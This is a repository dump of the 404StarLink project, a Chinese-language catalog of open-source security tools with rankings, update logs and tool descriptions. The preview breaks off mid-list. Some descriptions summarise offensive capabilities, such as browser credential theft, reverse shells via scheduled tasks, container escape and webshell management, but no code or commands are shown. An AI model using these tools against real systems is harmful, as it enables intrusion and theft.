Showing preview only (610K chars total). Download the full file or copy to clipboard to get everything.
Repository: knownsec/404StarLink
Branch: master
Commit: 5b066f644842
Files: 95
Total size: 581.8 KB
Directory structure:
gitextract_wm6jbvoe/
├── .github/
│ └── ISSUE_TEMPLATE/
│ └── application.yml
├── README.md
├── allprojects.md
├── banner.md
├── column/
│ ├── 2021KCon_exhibition_with_starlink.md
│ ├── 2022KCon_exhibition_with_starlink.md
│ ├── 2023KCon_exhibition_with_starlink.md
│ ├── 2024KCon_exhibition_with_starlink.md
│ └── starlink_project_video.md
├── detail/
│ ├── AiPy.md
│ ├── Antenna.md
│ ├── AntiDebug_Breaker.md
│ ├── AppInfoScanner.md
│ ├── AppScan.md
│ ├── As-Exploits.md
│ ├── BinAbsInspector.md
│ ├── BurpCrypto.md
│ ├── CDK.md
│ ├── Cloud-Bucket-Leak-Detection-Tools.md
│ ├── CodeReviewTools.md
│ ├── Cola-Dnslog.md
│ ├── CyberStrikeAI.md
│ ├── DNSlog-GO.md
│ ├── ENScanGo.md
│ ├── Elkeid.md
│ ├── Glass.md
│ ├── GrabAccess.md
│ ├── HaE.md
│ ├── HackBrowserData.md
│ ├── Hades.md
│ ├── Heimdallr.md
│ ├── JNDIMap.md
│ ├── JYso.md
│ ├── Juggler.md
│ ├── KunLun-M.md
│ ├── Kunpeng.md
│ ├── Kunyu.md
│ ├── LBot.md
│ ├── LSpider.md
│ ├── MDUT.md
│ ├── MySQL-Fake-Server.md
│ ├── MySQLMonitor.md
│ ├── MysqlT.md
│ ├── OpenStar.md
│ ├── Pillager.md
│ ├── Platypus.md
│ ├── Pocassist.md
│ ├── PortForward.md
│ ├── Redis-Rogue-Server.md
│ ├── ServerScan.md
│ ├── Stowaway.md
│ ├── Tai-e.md
│ ├── Typhon.md
│ ├── WMIHACKER.md
│ ├── WeaponizedVSCode.md
│ ├── ZoomEye-Python.md
│ ├── ZoomEye-Tools.md
│ ├── ZoomEye-go.md
│ ├── afrog.md
│ ├── agentic-soc-platform.md
│ ├── antSword.md
│ ├── appshark.md
│ ├── camille.md
│ ├── ct.md
│ ├── dperf.md
│ ├── f8x.md
│ ├── frida-skeleton.md
│ ├── fscan.md
│ ├── g3proxy.md
│ ├── gshark.md
│ ├── java-object-searcher.md
│ ├── js-cookie-monitor-debugger-hook.md
│ ├── ksubdomain.md
│ ├── linglong.md
│ ├── murphysec.md
│ ├── myscan.md
│ ├── passive-scan-client.md
│ ├── pocsuite3.md
│ ├── qscan.md
│ ├── rakshasa.md
│ ├── scaninfo.md
│ ├── shellcodeloader.md
│ ├── vArmor.md
│ ├── veinmind-tools.md
│ ├── vultrap.md
│ ├── wam.md
│ ├── xtate.md
│ └── ysomap.md
├── information_analysis.md
├── intranet_tools.md
├── others.md
├── party_a.md
├── penetration_test.md
├── reconnaissance.md
└── vulnerability_assessment.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/ISSUE_TEMPLATE/application.yml
================================================
name: 项目申请
description: 使用此表单填写项目申请
title: "[项目申请]: "
body:
- type: checkboxes
id: requirements
attributes:
label: 基本要求
description: 欢迎申请加入星链计划,请先判断是否符合以下条件
options:
- label: "1. 项目完全开源并遵守开源协议"
required: true
- label: "2. 项目提供README等项目描述"
required: true
- label: "3. 项目属于计算机安全范畴"
required: true
- label: "4. 项目具备一定的实用价值"
required: true
- label: "5. 项目不包含恶意功能或源码"
required: true
- label: "6. 项目将会积极维护"
required: true
- type: input
id: name
attributes:
label: 项目名称
validations:
required: true
- type: input
id: link
attributes:
label: 项目地址
validations:
required: true
- type: textarea
id: description
attributes:
label: 项目简介
validations:
required: true
- type: textarea
id: highlight
attributes:
label: 项目亮点
validations:
required: true
- type: markdown
attributes:
value: |
感谢申请加入 404 星链计划,我们将于 7 个工作日审核并回复,如有疑问可联系运营 WeChat:ks404team
================================================
FILE: README.md
================================================
## 404星链计划 / 404 StarLink Project
<div align="center">
<img src="Images/logo.png" width="300">
</div>
「404星链计划」是知道创宇 404 实验室于 2020 年 8 月开始的计划,主要目的是改善安全圈内工具庞杂、水平层次不齐、开源无人维护的多种问题,促进安全开源社区的发展;通过这种方式将不同安全领域研究人员与开源项目链接起来。
星链计划将不断地收集优秀的安全开源项目,对收录的项目提供技术支持,持续跟踪和展示项目的更新和动态,并建立了星链计划社区,社区用户可以通过星链展示板块探索自己感兴趣的项目,同时还可以在社区内快速为开源作者反馈问题。以此方式帮助开源项目成长,促进安全社区发展。

## 展示/Exhibition
<!--auto_index_exhibition_begin_5ffbdd274903479a5d958dd90847b2de-->
**1.项目动态**
| 时间 | 项目名称 | 项目动态 |
|----|-----------|--------------------------|
|2026-03-11|[**AntiDebug_Breaker**](detail/AntiDebug_Breaker.md)|AntiDebug_Breaker加入星链计划|
|2026-02-18|[**AntiDebug_Breaker**](detail/AntiDebug_Breaker.md)|更新 [v3.0.4](detail/AntiDebug_Breaker.md#最近更新) 版本|
|2026-03-10|[**CyberStrikeAI**](detail/CyberStrikeAI.md)|更新 [v1.3.23](detail/CyberStrikeAI.md#最近更新) 版本|
|2026-03-10|[**g3proxy**](detail/g3proxy.md)|更新 [v1.12.3](detail/g3proxy.md#最近更新) 版本|
|2026-03-04|[**HaE**](detail/HaE.md)|更新 [v5.1.1](detail/HaE.md#最近更新) 版本|
|2026-02-25|[**vArmor**](detail/vArmor.md)|更新 [v0.9.2](detail/vArmor.md#最近更新) 版本|
|2026-02-25|[**Typhon**](detail/Typhon.md)|更新 [v1.0.13](detail/Typhon.md#最近更新) 版本|
|2026-02-25|[**afrog**](detail/afrog.md)|更新 [v3.3.9](detail/afrog.md#最近更新) 版本|
|2026-02-23|[**CDK**](detail/CDK.md)|更新 [v1.5.6](detail/CDK.md#最近更新) 版本|
|2026-02-18|[**AiPy**](detail/AiPy.md)|更新 [v0.5.0](detail/AiPy.md#最近更新) 版本|
**2.StarRank**
| 序号 | 项目名称 | 项目简介 | Star |
|----|-----------|--------------------------|----|
|1|[**HackBrowserData**](detail/HackBrowserData.md)|hack-browser-data 是一个解密浏览器数据(密码/历史记录/Cookies/书签)的导出工具,支持全平台主流浏览器的数据导出窃取。|13587|
|2|[**fscan**](detail/fscan.md)|一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。|13461|
|3|[**dperf**](detail/dperf.md)|dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试,发布性能测试报告。|5560|
|4|[**CDK**](detail/CDK.md)|CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式,插件化管理。|4581|
|5|[**antSword**](detail/antSword.md)|中国蚁剑是一款开源的跨平台网站管理工具。|4488|
|6|[**ENScanGo**](detail/ENScanGo.md)|一款基于各大企业信息API的工具,解决在遇到的各种针对国内企业信息收集难题。一键收集控股公司ICP备案、APP、小程序、微信公众号等信息聚合导出。|4240|
|7|[**afrog**](detail/afrog.md)|afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描工具,PoC 包含 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。|4194|
|8|[**HaE**](detail/HaE.md)|HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。|4102|
|9|[**AiPy**](detail/AiPy.md)|AiPy是知道创宇站在AI技术变革前沿,基于LLM(大语言模型)与高级编程语言Python 完美融合,打造的一款突破性产品。AiPy以创新的技术范式和更低的成本,重构AI生产力边界,让大模型集思考能力和主动执行任务于一体。|3921|
|10|[**pocsuite3**](detail/pocsuite3.md)|pocsuite3是由Knownsec 404团队开发的开源远程漏洞测试和概念验证开发框架。它带有强大的概念验证引擎,以及针对最终渗透测试人员和安全研究人员的许多强大功能。|3821|
**3.项目更新**
| 时间 | 项目迭代版本 |
|----|-----------|
|第11周|[**AntiDebug_Breaker**](detail/AntiDebug_Breaker.md) 更新 [v3.0.4](detail/AntiDebug_Breaker.md#最近更新) / [**CyberStrikeAI**](detail/CyberStrikeAI.md) 更新 [v1.3.23](detail/CyberStrikeAI.md#最近更新) / [**g3proxy**](detail/g3proxy.md) 更新 [v1.12.3](detail/g3proxy.md#最近更新)|
|第10周|[**HaE**](detail/HaE.md) 更新 [v5.1.1](detail/HaE.md#最近更新)|
|第9周|[**vArmor**](detail/vArmor.md) 更新 [v0.9.2](detail/vArmor.md#最近更新) / [**Typhon**](detail/Typhon.md) 更新 [v1.0.13](detail/Typhon.md#最近更新) / [**afrog**](detail/afrog.md) 更新 [v3.3.9](detail/afrog.md#最近更新) / [**CDK**](detail/CDK.md) 更新 [v1.5.6](detail/CDK.md#最近更新)|
|第8周|[**AiPy**](detail/AiPy.md) 更新 [v0.5.0](detail/AiPy.md#最近更新)|
|第5周|[**agentic-soc-platform.json**](detail/agentic-soc-platform.md) 更新 [v0.2.0](detail/agentic-soc-platform.md#最近更新)|
|第4周|[**DNSlog-GO**](detail/DNSlog-GO.md) 更新 [v2.3.1](detail/DNSlog-GO.md#最近更新)|
|第1周|[**Tai-e**](detail/Tai-e.md) 更新 [v0.5.1](detail/Tai-e.md#最近更新) / [**JYso**](detail/JYso.md) 更新 [v1.3.6.1](detail/JYso.md#最近更新) / [**DNSlog-GO**](detail/DNSlog-GO.md) 更新 [v2.3.0](detail/DNSlog-GO.md#最近更新) / [**afrog**](detail/afrog.md) 更新 [v3.2.8](detail/afrog.md#最近更新)|
|第52周|[**CyberStrikeAI**](detail/CyberStrikeAI.md) 更新 [v0.0.11](detail/CyberStrikeAI.md#最近更新)|
|第49周|[**agentic-soc-platform.json**](detail/agentic-soc-platform.md) 更新 [v0.1.0](detail/agentic-soc-platform.md#最近更新)|
|第48周|[**AiPy**](detail/AiPy.md) 更新 [v0.4.0](detail/AiPy.md#最近更新) / [**qscan**](detail/qscan.md) 更新 [v1.8.1](detail/qscan.md#最近更新) / [**HaE**](detail/HaE.md) 更新 [v4.3.2](detail/HaE.md#最近更新)|
**4.新项目加入**
| 时间 | 项目名称 | 项目简介 |
|----|-----------|--------------------------|
|2026-03-11|[**AntiDebug_Breaker**](detail/AntiDebug_Breaker.md)|本插件是基于Hook_JS库所写的Google插件,将致力于辅助前端JavaScript逆向以及渗透测试信息收集。|
|2025-12-29|[**CyberStrikeAI**](detail/CyberStrikeAI.md)|CyberStrikeAI 是一款 AI 原生安全测试平台,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎与完整的测试生命周期管理能力|
|2025-12-05|[**agentic-soc-platform.json**](detail/agentic-soc-platform.md)|Agentic SOC Platform 是一个功能强大、灵活且开源的自动化安全运营平台。它集成了 AI Agent 能力与自动化编排,支持主流 SIEM/SOAR 场景,帮助企业高效构建智能化安全运营体系。|
|2025-12-01|[**Typhon**](detail/Typhon.md)|Typhon 是绕过 pyjail 的一把梭的CTF工具|
|2025-09-8|[**JNDIMap**](detail/JNDIMap.md)|一个 JNDI 注入利用框架, 支持 RMI、LDAP 和 LDAPS 协议, 包含多种高版本 JDK 绕过方式|
|2025-07-22|[**WeaponizedVSCode**](detail/WeaponizedVSCode.md)|一个基于VSCode工作区的黑客环境工具。|
|2025-05-13|[**qscan**](detail/qscan.md)|一个速度极快的内网扫描器,具备端口扫描、协议检测、指纹识别,暴力破解,漏洞探测等功能。支持协议1200+,协议指纹10000+,应用指纹20000+,暴力破解协议10余种。|
|2025-04-15|[**AiPy**](detail/AiPy.md)|AiPy是知道创宇站在AI技术变革前沿,基于LLM(大语言模型)与高级编程语言Python 完美融合,打造的一款突破性产品。AiPy以创新的技术范式和更低的成本,重构AI生产力边界,让大模型集思考能力和主动执行任务于一体。|
|2025-04-01|[**g3proxy**](detail/g3proxy.md)|通用正向代理解决方案,同时带有TCP映射、TLS卸载/封装、透明代理、简单反向代理等功能|
|2024-10-29|[**xtate**](detail/xtate.md)|Xtate是面向互联网规模网络测量的模块化全栈扫描器(框架)。利用自研的应用层无状态扫描模型ZBanner和混合状态轻量级TCP协议栈HLTCP实现异步高速扫描。与已有的无状态端口扫描器只能探测端口是否开放不同,Xtate基于应用层无状态扫描模型,在千兆带宽下能够在6分钟内完成中国大陆地址集中所有80端口的开放性检测和Banner抓取。基于HLTCP用户态协议栈实现和TLS支持,Xtate也能够在有状态模式下执行多轮数据交互的高速扫描,包括TLS上层服务Banner抓取。Xtate框架提供统一接口以自定义模块实现不同的扫描任务,专注于大规模网络的协议层面测量(包括传输层、应用层和TLS上层服务),具有坚实的底层高速异步数据包收发机制,期望为学术和实践领域中大规模网络测量的各种算法和任务提供承载平台。|
**5.[分类:甲方工具](party_a.md)**
| 序号 | 项目名称 | 作者 | 项目简介 | Star |
|------|----------|------|----------|------|
|1|[**Elkeid**](detail/Elkeid.md)|bytedance|Elkeid是一个云原生的基于主机的安全(入侵检测与风险识别)解决方案。Elkeid 包含两大部分:Elkeid Agent与Elkeid Driver作为数据采集层,它在Linux系统的内核和用户空间上均可使用,从而提供了具有更好性能的且更丰富的数据。 Elkeid Server可以提供百万级Agent的接入能力,采集Agent数据,支持控制与策略下发。包含实时、离线计算模块,对采集上来的数据进行分析和检测。又有自带的服务发现和管理系统,方便对整个后台管理和操作。|2596|
|2|[**linglong**](detail/linglong.md)|awake1t|linglong是一款甲方资产巡航扫描系统。系统定位是发现资产,进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示。|1830|
|3|[**Tai-e**](detail/Tai-e.md)|pascal_lab|Tai-e(太阿)是一个通用型Java程序分析框架,包含了开发程序分析技术所需的各类基础设施,并提供了可配置性高、功能强大的污点分析系统,用于检测各类隐私泄露、注入攻击等安全漏洞。|1768|
|4|[**murphysec**](detail/murphysec.md)|murphysecurity|墨菲安全专注于软件供应链安全,murphysec 是墨菲安全的 CLI 工具,用于在命令行检测指定目录代码的依赖安全问题,也可以基于 CLI 工具实现在 CI 流程的检测。|1753|
|5|[**appshark**](detail/appshark.md)|bytedance|Appshark 是一个针对安卓的静态分析工具,它的设计目标是针对超大型App的分析,Appshark支持基于json的自定义扫描规则,发现自己关心的安全漏洞以及隐私合规问题,支持灵活配置,可以在准确率以及扫描时间空间之间寻求平衡,支持自定义扩展规则,根据自己的业务需要,进行定制分析|1721|
|6|[**camille**](detail/camille.md)|zhengjim|现如今APP隐私合规十分重要,各监管部门不断开展APP专项治理工作及核查通报,不合规的APP通知整改或直接下架。camille可以hook住Android敏感接口,并识别是否为第三方SDK调用。根据隐私合规的场景,辅助检查是否符合隐私合规标准。|1656|
|7|[**veinmind-tools**](detail/veinmind-tools.md)|长亭科技|veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。|1645|
|8|[**OpenStar**](detail/OpenStar.md)|starjun|OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙,支持复杂规则编写。提供了常规的 HTTP 字段规则配置,还提供了 IP 黑白名单、访问频次等配置,对于 CC 防护更提供的特定的规则算法,并且支持搭建集群进行防护。|1282|
|9|[**AppScan**](detail/AppScan.md)|TongchengOpenSource|安全隐私卫士(AppScan)一款免费的企业级自动化App隐私合规检测工具|1089|
|10|[**GShark**](detail/gshark.md)|madneal|一款开源敏感信息检测系统,可以监测包括 GitHub, GitLab(支持私有部署版本), Postman, searchcode 多个平台的敏感信息监测。|1014|
**6.[分类:信息收集](reconnaissance.md)**
| 序号 | 项目名称 | 作者 | 项目简介 | Star |
|------|----------|------|----------|------|
|1|[**HaE**](detail/HaE.md)|gh0stkey|HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。|4102|
|2|[**AppInfoScanner**](detail/AppInfoScanner.md)|kelvinBen|一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。|3512|
|3|[**ksubdomain**](detail/ksubdomain.md)|w8ay|ksubdomain是一款基于无状态子域名爆破工具,支持在Windows/Linux/Mac上使用,它会很快的进行DNS爆破,在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。|1179|
|4|[**qscan**](detail/qscan.md)|qi4L|一个速度极快的内网扫描器,具备端口扫描、协议检测、指纹识别,暴力破解,漏洞探测等功能。支持协议1200+,协议指纹10000+,应用指纹20000+,暴力破解协议10余种。|1150|
|5|[**Kunyu**](detail/Kunyu.md)|风起|Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在让企业资产收集更高效,使更多安全相关从业者了解、使用网络空间测绘技术。|1058|
|6|[**Glass**](detail/Glass.md)|s7ckTeam|Glass是一款针对资产列表的快速指纹识别工具,通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹,也可针对IP/IP段或资产列表进行快速的指纹识别。|1007|
|7|[**scaninfo**](detail/scaninfo.md)|华东360安服团队|scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。|875|
|8|[**ZoomEye-Python**](detail/ZoomEye-Python.md)|Knownsec404|ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据|550|
|9|[**ct**](detail/ct.md)|rungobier@Knownsec404|ct 是一款使用 rust 语言进行开发,并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后可使用脚本,将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示|101|
|10|[**xtate**](detail/xtate.md)|sharkocha|Xtate是面向互联网规模网络测量的模块化全栈扫描器(框架)。利用自研的应用层无状态扫描模型ZBanner和混合状态轻量级TCP协议栈HLTCP实现异步高速扫描。与已有的无状态端口扫描器只能探测端口是否开放不同,Xtate基于应用层无状态扫描模型,在千兆带宽下能够在6分钟内完成中国大陆地址集中所有80端口的开放性检测和Banner抓取。基于HLTCP用户态协议栈实现和TLS支持,Xtate也能够在有状态模式下执行多轮数据交互的高速扫描,包括TLS上层服务Banner抓取。Xtate框架提供统一接口以自定义模块实现不同的扫描任务,专注于大规模网络的协议层面测量(包括传输层、应用层和TLS上层服务),具有坚实的底层高速异步数据包收发机制,期望为学术和实践领域中大规模网络测量的各种算法和任务提供承载平台。|85|
**7.全部分类**
* [甲方工具](party_a.md)
* [信息收集](reconnaissance.md)
* [漏洞探测](vulnerability_assessment.md)
* [攻击与利用](penetration_test.md)
* [信息分析](information_analysis.md)
* [内网工具](intranet_tools.md)
* [其他](others.md)
8.[入选2021Kcon黑客大会兵器谱](column/2021KCon_exhibition_with_starlink.md)
9.[入选2022Kcon黑客大会兵器谱](column/2022KCon_exhibition_with_starlink.md)
10.[入选2023Kcon黑客大会兵器谱](column/2023KCon_exhibition_with_starlink.md)
11.[入选2024Kcon黑客大会兵器谱](column/2024KCon_exhibition_with_starlink.md)
12.[星链计划全部项目](allprojects.md)
13.[正在申请加入的项目](https://github.com/knownsec/404StarLink/issues)
14.[星链计划视频演示栏目-星际奇兵](column/starlink_project_video.md)
<!--auto_index_exhibition_end_bb3ccc282a0d1924df21437a263718c3-->
## 加入/Join
开源作者可以通过提交 issue 申请加入星链计划,星链计划除了提供技术支持,还准备了各种里程碑奖励。
<div align="center">
<img src="Images/milestone_horizontal.jpg" width=100%>
</div>
[奖品实物一览](Images/milestone_prizes.png)
**1.提交申请**
开源作者可以通过 <https://github.com/knownsec/404StarLink/issues> 提交申请,申请规范如下:
```
### 项目名称
### 项目链接
### 项目简介
### 项目特点、亮点
```
提交申请后可以通过文末的联系方式添加星链运营微信账号,备注为「项目名称+星链计划」,运营小姐姐将协助你完成项目审核,以及进行后续的各类沟通。
**2.项目规范审核**
申请提交后,星链运营对项目的基础规范进行审核,基础规范包括:
```
1. README.md (包括但不限于:项目简介、运行环境搭建、运行示例等)
2. CHANGELOG (记录项目更新)
3. LICENCE (为避免开源纠纷,需要提前选择开源协议)
4. 编译型项目需提供 RELEASE 版本
5. 项目需要和安全相关
6. 必须是完整的开源项目(不能是二进制文件,或部分开源)
```
**3.技术审核**
项目通过基础规范审核后,将由星链评审组对项目进行技术审核,包括但不限于:
```
1. 项目属于计算机安全范畴
2. 项目完整开源
3. 项目源码内不包含恶意代码
4. 项目具有一定的实用价值
5. 项目可以正常部署和使用
6. etc
```
**4.发放邀请函**
项目通过基础规范审核和技术审核后,由星链计划发送官方邀请函邮件到开源作者,邀请其正式加入星链计划。随后星链计划将持续跟踪项目动态,并按里程碑为开源作者发放礼品。
>开源作者收到星链计划邀请函后,希望开源作者可以添加 [星链计划 Banner](./banner.md) 到项目 README 的末尾,这样可以极大增加星链计划的影响力。
## 交流/Community
加入星链计划交流群,获取星链计划资讯,与开源作者互动起来吧。微信群请先添加星链运营个人账号,并备注「星链计划」,然后会把大家拉到星链计划交流群中。
<div align="center">
<img src="Images/operation_wechat.jpg" width=300px>
</div>
下方表单用于收集用户在使用404星链计划所属工具的过程中遇到的问题,我们将联合相关工具开发者进行解答,并定期将答疑内容整理发布,以供参考交流。
<div align="center">
<img src="Images/question-and-answer.png" width=300px>
</div>
================================================
FILE: allprojects.md
================================================
## 全部项目 / All_Projects
* [甲方工具/party_a](#甲方工具party_a)
* [dperf](#dperf)
* [Elkeid](#elkeid)
* [linglong](#linglong)
* [Tai-e](#tai-e)
* [murphysec](#murphysec)
* [appshark](#appshark)
* [camille](#camille)
* [veinmind-tools](#veinmind-tools)
* [OpenStar](#openstar)
* [AppScan](#appscan)
* [gshark](#gshark)
* [Juggler](#juggler)
* [vArmor](#varmor)
* [Hades](#hades)
* [信息收集/reconnaissance](#信息收集reconnaissance)
* [ENScanGo](#enscango)
* [HaE](#hae)
* [AppInfoScanner](#appinfoscanner)
* [ksubdomain](#ksubdomain)
* [qscan](#qscan)
* [Kunyu](#kunyu)
* [Glass](#glass)
* [scaninfo](#scaninfo)
* [ZoomEye-Python](#zoomeye-python)
* [ct](#ct)
* [xtate](#xtate)
* [ZoomEye-Tools](#zoomeye-tools)
* [ZoomEye-go](#zoomeye-go)
* [vultrap](#vultrap)
* [漏洞探测/vulnerability_assessment](#漏洞探测vulnerability_assessment)
* [afrog](#afrog)
* [Kunpeng](#kunpeng)
* [Pocassist](#pocassist)
* [myscan](#myscan)
* [LSpider](#lspider)
* [攻击与利用/penetration_test](#攻击与利用penetration_test)
* [dperf](#dperf)
* [CDK](#cdk)
* [pocsuite3](#pocsuite3)
* [MDUT](#mdut)
* [JYso](#jyso)
* [BurpCrypto](#burpcrypto)
* [WMIHACKER](#wmihacker)
* [MySQL-Fake-Server](#mysql-fake-server)
* [DNSlog-GO](#dnslog-go)
* [Cloud-Bucket-Leak-Detection-Tools](#cloud-bucket-leak-detection-tools)
* [ysomap](#ysomap)
* [Antenna](#antenna)
* [GrabAccess](#grabaccess)
* [Redis-Rogue-Server](#redis-rogue-server)
* [Cola-Dnslog](#cola-dnslog)
* [MysqlT](#mysqlt)
* [信息分析/information_analysis](#信息分析information_analysis)
* [HackBrowserData](#hackbrowserdata)
* [KunLun-M](#kunlun-m)
* [Pillager](#pillager)
* [AppScan](#appscan)
* [frida-skeleton](#frida-skeleton)
* [java-object-searcher](#java-object-searcher)
* [js-cookie-monitor-debugger-hook](#js-cookie-monitor-debugger-hook)
* [MySQLMonitor](#mysqlmonitor)
* [CodeReviewTools](#codereviewtools)
* [内网工具/intranet_tools](#内网工具intranet_tools)
* [fscan](#fscan)
* [antSword](#antsword)
* [Stowaway](#stowaway)
* [shellcodeloader](#shellcodeloader)
* [ServerScan](#serverscan)
* [Platypus](#platypus)
* [WMIHACKER](#wmihacker)
* [rakshasa](#rakshasa)
* [As-Exploits](#as-exploits)
* [g3proxy](#g3proxy)
* [PortForward](#portforward)
* [其他/others](#其他others)
* [AiPy](#aipy)
* [CyberStrikeAI](#cyberstrikeai)
* [f8x](#f8x)
* [BinAbsInspector](#binabsinspector)
* [Heimdallr](#heimdallr)
* [passive-scan-client](#passive-scan-client)
* [AntiDebug_Breaker](#antidebug_breaker)
* [agentic-soc-platform](#agentic-soc-platform)
* [GrabAccess](#grabaccess)
* [JNDIMap](#jndimap)
* [Typhon](#typhon)
* [wam](#wam)
* [WeaponizedVSCode](#weaponizedvscode)
* [LBot](#lbot)
----------------------------------------
## 甲方工具/party_a
### [dperf](detail/dperf.md)




<https://github.com/baidu/dperf>
dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试,发布性能测试报告。
### [Elkeid](detail/Elkeid.md)




<https://github.com/bytedance/Elkeid>
Elkeid是一个云原生的基于主机的安全(入侵检测与风险识别)解决方案。Elkeid 包含两大部分:Elkeid Agent与Elkeid Driver作为数据采集层,它在Linux系统的内核和用户空间上均可使用,从而提供了具有更好性能的且更丰富的数据。 Elkeid Server可以提供百万级Agent的接入能力,采集Agent数据,支持控制与策略下发。包含实时、离线计算模块,对采集上来的数据进行分析和检测。又有自带的服务发现和管理系统,方便对整个后台管理和操作。
### [linglong](detail/linglong.md)




<https://github.com/awake1t/linglong>
linglong是一款甲方资产巡航扫描系统。系统定位是发现资产,进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示。
### [Tai-e](detail/Tai-e.md)




<https://github.com/pascal-lab/Tai-e>
Tai-e(太阿)是一个通用型Java程序分析框架,包含了开发程序分析技术所需的各类基础设施,并提供了可配置性高、功能强大的污点分析系统,用于检测各类隐私泄露、注入攻击等安全漏洞。
### [murphysec](detail/murphysec.md)




<https://github.com/murphysecurity/murphysec>
墨菲安全专注于软件供应链安全,murphysec 是墨菲安全的 CLI 工具,用于在命令行检测指定目录代码的依赖安全问题,也可以基于 CLI 工具实现在 CI 流程的检测。
### [appshark](detail/appshark.md)




<https://github.com/bytedance/appshark>
Appshark 是一个针对安卓的静态分析工具,它的设计目标是针对超大型App的分析,Appshark支持基于json的自定义扫描规则,发现自己关心的安全漏洞以及隐私合规问题,支持灵活配置,可以在准确率以及扫描时间空间之间寻求平衡,支持自定义扩展规则,根据自己的业务需要,进行定制分析
### [camille](detail/camille.md)




<https://github.com/zhengjim/camille>
现如今APP隐私合规十分重要,各监管部门不断开展APP专项治理工作及核查通报,不合规的APP通知整改或直接下架。camille可以hook住Android敏感接口,并识别是否为第三方SDK调用。根据隐私合规的场景,辅助检查是否符合隐私合规标准。
### [veinmind-tools](detail/veinmind-tools.md)




<https://github.com/chaitin/veinmind-tools>
veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。
### [OpenStar](detail/OpenStar.md)




<https://github.com/starjun/openstar>
OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙,支持复杂规则编写。提供了常规的 HTTP 字段规则配置,还提供了 IP 黑白名单、访问频次等配置,对于 CC 防护更提供的特定的规则算法,并且支持搭建集群进行防护。
### [AppScan](detail/AppScan.md)




<https://github.com/TongchengOpenSource/AppScan>
安全隐私卫士(AppScan)一款免费的企业级自动化App隐私合规检测工具
### [GShark](detail/gshark.md)




<https://github.com/madneal/gshark>
一款开源敏感信息检测系统,可以监测包括 GitHub, GitLab(支持私有部署版本), Postman, searchcode 多个平台的敏感信息监测。
### [Juggler](detail/Juggler.md)




<https://github.com/C4o/Juggler>
一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。
### [vArmor](detail/vArmor.md)




<https://github.com/bytedance/vArmor>
vArmor 是一个云原生容器沙箱系统,它借助 Linux 的 LSM 技术(AppArmor & BPF)实现强制访问控制器(即 enforcer),从而对容器进行安全加固。它可以用于增强容器隔离性、减少内核攻击面、增加容器逃逸或横行移动攻击的难度与成本。vArmor 遵循 Kubernetes Operator 设计模式,用户可通过操作 CRD API 对特定的 Workload 进行加固。从而以更贴近业务的视角,实现对容器化微服务的沙箱加固。此外 vArmor 还包含多种内置加固策略,具备开箱即用的特性。
### [Hades](detail/Hades.md)




<https://github.com/theSecHunter/Hades>
Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统,其中每个插件均可独立分开运行。
## 信息收集/reconnaissance
### [ENScanGo](detail/ENScanGo.md)




<https://github.com/wgpsec/ENScan_GO>
一款基于各大企业信息API的工具,解决在遇到的各种针对国内企业信息收集难题。一键收集控股公司ICP备案、APP、小程序、微信公众号等信息聚合导出。
### [HaE](detail/HaE.md)




<https://github.com/gh0stkey/HaE>
HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。
### [AppInfoScanner](detail/AppInfoScanner.md)




<https://github.com/kelvinBen/AppInfoScanner>
一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。
### [ksubdomain](detail/ksubdomain.md)




<https://github.com/boy-hack/ksubdomain>
